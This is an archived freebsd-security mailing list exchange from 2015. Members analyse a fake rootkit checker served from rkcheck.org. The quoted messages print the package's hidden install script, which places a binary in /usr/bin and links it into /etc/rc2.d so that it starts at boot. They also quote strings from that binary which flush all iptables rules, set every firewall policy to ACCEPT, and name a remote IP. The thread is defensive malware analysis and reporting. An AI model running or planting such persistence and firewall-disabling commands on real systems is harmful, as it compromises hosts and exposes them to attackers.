has my 10.1-RELEASE system been compromised
Philip Jocks
pjlists at netzkommune.com
Wed Feb 25 21:04:49 UTC 2015
> Am 25.02.2015 um 21:55 schrieb Christopher Schulte <christopher at schulte.org>:
>
>
>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
>>
>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains
>>
>> #!/bin/bash
>>
>> cp tests/.unit/test /usr/bin/rrsyncn
>> chmod +x /usr/bin/rrsyncn
>> rm -fr /etc/rc2.d/S98rsyncn
>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
>> /usr/bin/rrsyncn
>> exit
>>
>> That doesn't look like something you'd want on your box…
>
> I filed a report with Google about that domain (Google Safe Browsing), briefly describing what’s been recounted here on this thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few lines of a simple string dump are interesting… take note what looks to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se who own the network.
Philip
More information about the freebsd-security
mailing list